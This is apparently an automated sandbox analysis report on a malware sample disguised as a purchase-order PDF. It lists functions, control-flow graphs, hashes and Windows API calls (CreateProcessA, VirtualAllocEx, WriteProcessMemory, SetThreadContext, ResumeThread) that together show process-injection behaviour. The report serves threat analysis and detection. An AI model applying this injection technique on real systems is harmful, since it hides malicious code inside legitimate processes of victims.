                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8
                                                          • API String ID: 0-4194326291
                                                          • Opcode ID: 69a45ea0d24657e3feb82dc9585a994c88a6e97592b3734f0dd7c3e5fc79e68f
                                                          • Instruction ID: 36ec4cc3e8016426c4b961393a7d37eb5934b477d41f34f1482f455ec2debe37
                                                          • Opcode Fuzzy Hash: 69a45ea0d24657e3feb82dc9585a994c88a6e97592b3734f0dd7c3e5fc79e68f
                                                          • Instruction Fuzzy Hash: AF52D475E006298FDBA4DF69C890BD9B7B1FB89310F1082EAD549A7354DB30AE85CF50
                                                          Function 029D3F74 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 91 29d3f74-29d3f75 92 29d3f77-29d3ff0 91->92 93 29d3f31-29d3f40 91->93 103 29d4029-29d4049 92->103 104 29d3ff2-29d3ffc 92->104 94 29d3ea6-29d3eac 93->94 95 29d3f46-29d3f4c 93->95 97 29d3eae 94->97 98 29d3eb5-29d3eb6 94->98 95->94 100 29d3ebb-29d3f18 97->100 101 29d3f54-29d3f5c 97->101 102 29d3f51-29d3f52 97->102 98->100 98->102 122 29d3f20-29d3f2e 100->122 102->101 112 29d404b-29d4055 103->112 113 29d4082-29d40bc 103->113 104->103 105 29d3ffe-29d4000 104->105 107 29d4023-29d4026 105->107 108 29d4002-29d400c 105->108 107->103 110 29d400e 108->110 111 29d4010-29d401f 108->111 110->111 111->111 115 29d4021 111->115 112->113 116 29d4057-29d4059 112->116 123 29d40be-29d40c8 113->123 124 29d40f5-29d416a CreateProcessA 113->124 115->107 117 29d407c-29d407f 116->117 118 29d405b-29d4065 116->118 117->113 120 29d4069-29d4078 118->120 121 29d4067 118->121 120->120 125 29d407a 120->125 121->120 122->93 123->124 126 29d40ca-29d40cc 123->126 134 29d416c-29d4172 124->134 135 29d4173-29d41bb 124->135 125->117 128 29d40ef-29d40f2 126->128 129 29d40ce-29d40d8 126->129 128->124 130 29d40dc-29d40eb 129->130 131 29d40da 129->131 130->130 133 29d40ed 130->133 131->130 133->128 134->135 140 29d41bd-29d41c1 135->140 141 29d41cb-29d41cf 135->141 140->141 142 29d41c3 140->142 143 29d41df-29d41e3 141->143 144 29d41d1-29d41d5 141->144 142->141 146 29d41e5-29d41e9 143->146 147 29d41f3 143->147 144->143 145 29d41d7 144->145 145->143 146->147 148 29d41eb 146->148 149 29d41f4 147->149 148->147 149->149
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 029D415A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: d3bf52abe6d39be10d9531bb23e16c6575af2b2f55402be8aca8cc64eb74ce78
                                                          • Instruction ID: a841aea025e3a9ef9bd97c6151730ea29430082fd61701ccb4d71be1385f0553
                                                          • Opcode Fuzzy Hash: d3bf52abe6d39be10d9531bb23e16c6575af2b2f55402be8aca8cc64eb74ce78
                                                          • Instruction Fuzzy Hash: 02A13671E0064A8FDB10DFA9C9817EEBBF1FB48314F149529E859E7284DB749881DF81
                                                          Function 029D3508 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 216 29d3508-29d35a6 NtProtectVirtualMemory 220 29d35af-29d35d4 216->220 221 29d35a8-29d35ae 216->221 221->220
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D3599
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: d877e068050b9b4b484132203f62d544f005d1cfe88347fc997fab99496cb29c
                                                          • Instruction ID: 937d3c389fdb798fa04cf980725ec98a48bbe30fad35d624fc56da6418091701
                                                          • Opcode Fuzzy Hash: d877e068050b9b4b484132203f62d544f005d1cfe88347fc997fab99496cb29c
                                                          • Instruction Fuzzy Hash: 2A21EFB1D013499FDB10CFAAD984AEEBBF5BF88310F20842AE519A7210D7759911CFA5
                                                          Function 029D3510 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 235 29d3510-29d35a6 NtProtectVirtualMemory 239 29d35af-29d35d4 235->239 240 29d35a8-29d35ae 235->240 240->239
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D3599
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: 0793ca305a1f5df378ac4a9cb9f723cf3881ab973fc3713f4c850458fa7cae3f
                                                          • Instruction ID: a57f5c5022a07d8039e81e001682a2217e2658b59becea01e77576e414145c1d
                                                          • Opcode Fuzzy Hash: 0793ca305a1f5df378ac4a9cb9f723cf3881ab973fc3713f4c850458fa7cae3f
                                                          • Instruction Fuzzy Hash: 6021FFB1D013499FDB10CFAAD984A9EFBF5FF48310F20842AE519A7200C775A910CBA5
                                                          Function 029D57B2 Relevance: 1.6, APIs: 1, Instructions: 55nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 262 29d57b2-29d5833 NtResumeThread 265 29d583c-29d5861 262->265 266 29d5835-29d583b 262->266 266->265
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 029D5826
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 74f4ff1678686727d4a2c0088bb85ec9d7d7ff0970eafa30570150cee135369c
                                                          • Instruction ID: a3ff725812c92676f64f6e2e663bef20253bec80d32808cbdecc08c66fdff0d8
                                                          • Opcode Fuzzy Hash: 74f4ff1678686727d4a2c0088bb85ec9d7d7ff0970eafa30570150cee135369c
                                                          • Instruction Fuzzy Hash: 3811F4B1D003498FDB10DFAAC485AAEFBF5AF88320F24842AD519A7240DB795905CFA1
                                                          Function 029D57B8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 270 29d57b8-29d5833 NtResumeThread 273 29d583c-29d5861 270->273 274 29d5835-29d583b 270->274 274->273
                                                          APIs
                                                          • NtResumeThread.NTDLL(?,?), ref: 029D5826
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: ead549bc98ddf7cf97520c7a00a5b6ee645ceebbc70277addc61237f66dbfa1f
                                                          • Instruction ID: 2e00869d1887417a160605a1de59f2d6b461e788180412461ef52a1f0ac953cc
                                                          • Opcode Fuzzy Hash: ead549bc98ddf7cf97520c7a00a5b6ee645ceebbc70277addc61237f66dbfa1f
                                                          • Instruction Fuzzy Hash: D71106B1D003498FDB10DFAAC484B9EFBF4AF88220F50842AD519A7240CB786904CFA5
                                                          Function 029D35D8 Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 286 29d35d8-29d35d9 287 29d35db-29d35f2 286->287 288 29d3595-29d35a6 NtProtectVirtualMemory 286->288 292 29d35f9-29d3616 287->292 293 29d35f4 287->293 290 29d35af-29d35d4 288->290 291 29d35a8-29d35ae 288->291 291->290 293->292
                                                          APIs
                                                          • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 029D3599
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2706961497-0
                                                          • Opcode ID: bc3dc78fa95efd13cf969aa17c21c23c6d8fb8338df6aa4cef7fe5c99af555f4
                                                          • Instruction ID: 19b37692e3895a7cd576919c00828e8a3d9dadb08e48ea8c8c1600751b572b81
                                                          • Opcode Fuzzy Hash: bc3dc78fa95efd13cf969aa17c21c23c6d8fb8338df6aa4cef7fe5c99af555f4
                                                          • Instruction Fuzzy Hash: FD0149725053848FE720EBA9EC0879FBBF49F41314F14C496D18AA35A1CB785C54CB62
                                                          Function 029D3252 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 300 29d3252-29d3285 302 29d328c-29d32a6 300->302 303 29d3287 300->303 306 29d32a9-29d32af 302->306 303->302 307 29d32b8-29d32b9 306->307 308 29d32b1 306->308 310 29d32be-29d32c5 307->310 313 29d3422-29d34a2 call 29d1e60 307->313 309 29d331e-29d3411 308->309 308->310 311 29d3318-29d3319 308->311 312 29d34d5-29d34de 308->312 308->313 309->306 337 29d3417-29d341d 309->337 314 29d32cc-29d32db 310->314 315 29d32c7 310->315 311->312 329 29d34a7-29d34c2 313->329 317 29d32dd-29d32e0 314->317 318 29d32ea-29d330c 314->318 315->314 317->318 318->306 320 29d330e-29d3316 318->320 320->306 329->306 330 29d34c8-29d34d0 329->330 330->306 337->306
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }*8y
                                                          • API String ID: 0-3012366600
                                                          • Opcode ID: 938dc9e497347d194c06207a5d6e361b8c51ce7974765203be6fb10d378d4438
                                                          • Instruction ID: e371848214196e8e192c75566d2f3550c249d2e239d3b074a8e4081431f99583
                                                          • Opcode Fuzzy Hash: 938dc9e497347d194c06207a5d6e361b8c51ce7974765203be6fb10d378d4438
                                                          • Instruction Fuzzy Hash: BC810374E00208DFDB48DFA9D554AAEBBF2FF88300F108069E519AB355DB34A945CF95
                                                          Function 029D3260 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: }*8y
                                                          • API String ID: 0-3012366600
                                                          • Opcode ID: be9c791c25224bba32b1c13decf8ee2249309387bdef3004ed435fd9ec4a286c
                                                          • Instruction ID: 8aa524183ebd67fad15821771ad2d1eea35e0c9df6363c5e5b6ec41561a273e2
                                                          • Opcode Fuzzy Hash: be9c791c25224bba32b1c13decf8ee2249309387bdef3004ed435fd9ec4a286c
                                                          • Instruction Fuzzy Hash: 1F810374E00208DFDB48DFA9D594AAEBBF2FF88300F108069E519AB355DB34A945CF55
                                                          Function 029D0006 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: h
                                                          • API String ID: 0-2439710439
                                                          • Opcode ID: ff4d8b589abc61322b802a6c7c63a9aacdeed82527aecaa69d3b961ee199c862
                                                          • Instruction ID: bcd16b7aa93c13640ca83251af4ef8ec9666cc105b233bad429f310bdd6ee0e2
                                                          • Opcode Fuzzy Hash: ff4d8b589abc61322b802a6c7c63a9aacdeed82527aecaa69d3b961ee199c862
                                                          • Instruction Fuzzy Hash: 72814770E046688FDB65DF69CC50BD9BBB2FF8A300F1082EAC449A7254DB306A85CF50
                                                          Function 010BD8E0 Relevance: 1.0, Instructions: 983COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eff56f6cdf415d390269f016d445cf84822a79fc23a9e7c3d081d474b04dc626
                                                          • Instruction ID: 2bd30f49f4a0cfa45b71837d073f5854d2ddfa21e664acf9076f5bb8769d46b5
                                                          • Opcode Fuzzy Hash: eff56f6cdf415d390269f016d445cf84822a79fc23a9e7c3d081d474b04dc626
                                                          • Instruction Fuzzy Hash: 85A2B375A00228CFDB65CF69C984AD9BBB2FF89304F1581E9D549AB325DB319E81CF40
                                                          Function 010B9B51 Relevance: .2, Instructions: 173COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fc7527d009f7da4d7fa7451c6a119d835a2606ba020d07291ae7680ad6fa9b9f
                                                          • Instruction ID: 95e944abc6c7bdc369f88200a9797181d25b35f61d7ec8c9d59711eca32b4e50
                                                          • Opcode Fuzzy Hash: fc7527d009f7da4d7fa7451c6a119d835a2606ba020d07291ae7680ad6fa9b9f
                                                          • Instruction Fuzzy Hash: 6D71E870E00605CFD719EF6AE99068EBBF2FFC8304F14C52AD145AB668EF7919069B50
                                                          Function 010B9B60 Relevance: .2, Instructions: 165COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200499427.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10b0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44493e5246db81cdab84b17863f202e20790c1cb945a184b7d2ce479371a5216
                                                          • Instruction ID: 98decec4589d956d9dab4828a88b70601725b57deff39f426850be7c462b4780
                                                          • Opcode Fuzzy Hash: 44493e5246db81cdab84b17863f202e20790c1cb945a184b7d2ce479371a5216
                                                          • Instruction Fuzzy Hash: 0971E870E00605CFD719EF6AE99069EBBF2FFC8304F14C12AD145AB668EF7919069B50
                                                          Function 029D256F Relevance: .1, Instructions: 108COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0e26a903a9c3a834d267ec38c689190ca5607f86c7f32c1adccfe6fb6c94779a
                                                          • Instruction ID: 62ae40867ebc33689f9d35b29adc5e0a35a24cbb11265171539dec7021f8218d
                                                          • Opcode Fuzzy Hash: 0e26a903a9c3a834d267ec38c689190ca5607f86c7f32c1adccfe6fb6c94779a
                                                          • Instruction Fuzzy Hash: F5419D74D05218DFEB28CF6AD95079EBBF6AF89300F10C0AAD808A7256DB704A85DF50
                                                          Function 029D3F80 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 150 29d3f80-29d3ff0 152 29d4029-29d4049 150->152 153 29d3ff2-29d3ffc 150->153 160 29d404b-29d4055 152->160 161 29d4082-29d40bc 152->161 153->152 154 29d3ffe-29d4000 153->154 155 29d4023-29d4026 154->155 156 29d4002-29d400c 154->156 155->152 158 29d400e 156->158 159 29d4010-29d401f 156->159 158->159 159->159 162 29d4021 159->162 160->161 163 29d4057-29d4059 160->163 169 29d40be-29d40c8 161->169 170 29d40f5-29d416a CreateProcessA 161->170 162->155 164 29d407c-29d407f 163->164 165 29d405b-29d4065 163->165 164->161 167 29d4069-29d4078 165->167 168 29d4067 165->168 167->167 171 29d407a 167->171 168->167 169->170 172 29d40ca-29d40cc 169->172 180 29d416c-29d4172 170->180 181 29d4173-29d41bb 170->181 171->164 174 29d40ef-29d40f2 172->174 175 29d40ce-29d40d8 172->175 174->170 176 29d40dc-29d40eb 175->176 177 29d40da 175->177 176->176 179 29d40ed 176->179 177->176 179->174 180->181 186 29d41bd-29d41c1 181->186 187 29d41cb-29d41cf 181->187 186->187 188 29d41c3 186->188 189 29d41df-29d41e3 187->189 190 29d41d1-29d41d5 187->190 188->187 192 29d41e5-29d41e9 189->192 193 29d41f3 189->193 190->189 191 29d41d7 190->191 191->189 192->193 194 29d41eb 192->194 195 29d41f4 193->195 194->193 195->195
                                                          APIs
                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 029D415A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 0ba73da170c85a37916a3724d2886002aed2c355560a2c5b604fd4c582689aaa
                                                          • Instruction ID: 7cff0a0de3606fdeb6aa1f4d30706ed57af064b85f9f9af77e1d06b93dfaf84a
                                                          • Opcode Fuzzy Hash: 0ba73da170c85a37916a3724d2886002aed2c355560a2c5b604fd4c582689aaa
                                                          • Instruction Fuzzy Hash: FA816671E0021A9FDB10CFA9C8817EEBBF1BF48314F149229E858E7284DB758881DF81
                                                          Function 029D50E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 206 29d50e8-29d5136 208 29d5138-29d5144 206->208 209 29d5146-29d5185 WriteProcessMemory 206->209 208->209 211 29d518e-29d51be 209->211 212 29d5187-29d518d 209->212 212->211
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029D5178
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 0779bdce4743b935a1d2e6c911a8a200ca7744c50688000e208afae20d307555
                                                          • Instruction ID: 623ae1bd5b3dcba08601722162422648f89f666d8e0052cfce2f351e0f8b715b
                                                          • Opcode Fuzzy Hash: 0779bdce4743b935a1d2e6c911a8a200ca7744c50688000e208afae20d307555
                                                          • Instruction Fuzzy Hash: F62124759003499FDB10CFAAC985BEEBBF5FF48314F10842AE918A7240D7789954CBA4
                                                          Function 029D50E0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 196 29d50e0-29d5136 198 29d5138-29d5144 196->198 199 29d5146-29d5185 WriteProcessMemory 196->199 198->199 201 29d518e-29d51be 199->201 202 29d5187-29d518d 199->202 202->201
                                                          APIs
                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 029D5178
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: becc52b6a6db633cba317d79ccabaa297903e1dc094a9b13701264c680f5baa1
                                                          • Instruction ID: 6f4ab5571fcca450d916e36c893db358afe4c1667a7b5eba0d9c3a59da63b36b
                                                          • Opcode Fuzzy Hash: becc52b6a6db633cba317d79ccabaa297903e1dc094a9b13701264c680f5baa1
                                                          • Instruction Fuzzy Hash: 262113B6900359DFDB10CFA9C985BEEBBF5FF48314F10842AE919A7240D7789954CBA0
                                                          Function 029D4788 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 225 29d4788-29d47db 227 29d47dd-29d47e9 225->227 228 29d47eb-29d481b Wow64SetThreadContext 225->228 227->228 230 29d481d-29d4823 228->230 231 29d4824-29d4854 228->231 230->231
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029D480E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 4ea23d1662d0997856923fa7ec51fb10a23f71891cac478a23f42997106a20db
                                                          • Instruction ID: f5c216b5df9be6d4c96ccf9ff787d61a9acaca21361b6d40b6ee0fe6fe2c860a
                                                          • Opcode Fuzzy Hash: 4ea23d1662d0997856923fa7ec51fb10a23f71891cac478a23f42997106a20db
                                                          • Instruction Fuzzy Hash: 212138B1D003498FDB10CFAAC485BEEBBF5EF89324F14842AD559A7240DB789945CFA0
                                                          Function 029D4790 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 244 29d4790-29d47db 246 29d47dd-29d47e9 244->246 247 29d47eb-29d481b Wow64SetThreadContext 244->247 246->247 249 29d481d-29d4823 247->249 250 29d4824-29d4854 247->250 249->250
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 029D480E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: d2bd198a2aaf54880ea3d02b4f54928b83cf917e30914913d533234e9d7c7956
                                                          • Instruction ID: d198ef364e78b06431ec7608eb49209228630bc2c5c9326a3ce557b8644ba986
                                                          • Opcode Fuzzy Hash: d2bd198a2aaf54880ea3d02b4f54928b83cf917e30914913d533234e9d7c7956
                                                          • Instruction Fuzzy Hash: 1E214971D003498FDB10CFAAC485BEEBBF4EF88324F14842AD519A7240DB789944CFA4
                                                          Function 029D4DE0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 254 29d4de0-29d4e63 VirtualAllocEx 257 29d4e6c-29d4e91 254->257 258 29d4e65-29d4e6b 254->258 258->257
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 029D4E56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 82cf0fd5eab00dc90e985c896272b0165819a911a06b62756c0f5362cdf2d25f
                                                          • Instruction ID: 44972b6ff5aed02e7e635dc8b380f6f7a57c8de01d2336656f2d28f83eeadf57
                                                          • Opcode Fuzzy Hash: 82cf0fd5eab00dc90e985c896272b0165819a911a06b62756c0f5362cdf2d25f
                                                          • Instruction Fuzzy Hash: 711136729002499FDF10DFA9C845AEFBBF5AF88320F248819E519A7250C7759915CFA0
                                                          Function 029D4DE8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 278 29d4de8-29d4e63 VirtualAllocEx 281 29d4e6c-29d4e91 278->281 282 29d4e65-29d4e6b 278->282 282->281
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 029D4E56
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2200689200.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_29d0000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 57a3b6e6f0514221d39604b687f1b732f1d989b23aacceec58d642cb99e64817
                                                          • Instruction ID: 5d5e72e26d52b9cde2b73110ef46503d349ab548203adbf5bba9d9740eca600d
                                                          • Opcode Fuzzy Hash: 57a3b6e6f0514221d39604b687f1b732f1d989b23aacceec58d642cb99e64817
                                                          • Instruction Fuzzy Hash: 7E1126729003499FDF10DFAAC845BDFBBF5AF88720F148819E519A7250CB75A550CFA0
                                                          Function 075155DD Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7510000_PO#83298373729383838392387373873PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: B
                                                          • API String ID: 0-1255198513
                                                          • Opcode ID: ab6c4f19d254b13fa243451caf38f6e901cd3597c49daa30e8cc7b435556aaff
                                                          • Instruction ID: be6e8429aa51b6dd5157673aaf96fcd1f9b9705b6bada3399a9c1b69a1d59728
                                                          • Opcode Fuzzy Hash: ab6c4f19d254b13fa243451caf38f6e901cd3597c49daa30e8cc7b435556aaff
                                                          • Instruction Fuzzy Hash: 3F11D6B494422ACBDB60DF18C888BD9B7B1FB09305F1081E6D55DA3684DB785EC98F51
                                                          Function 07516682 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2241432233.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                                          Joe Sandbox IDA Plugin
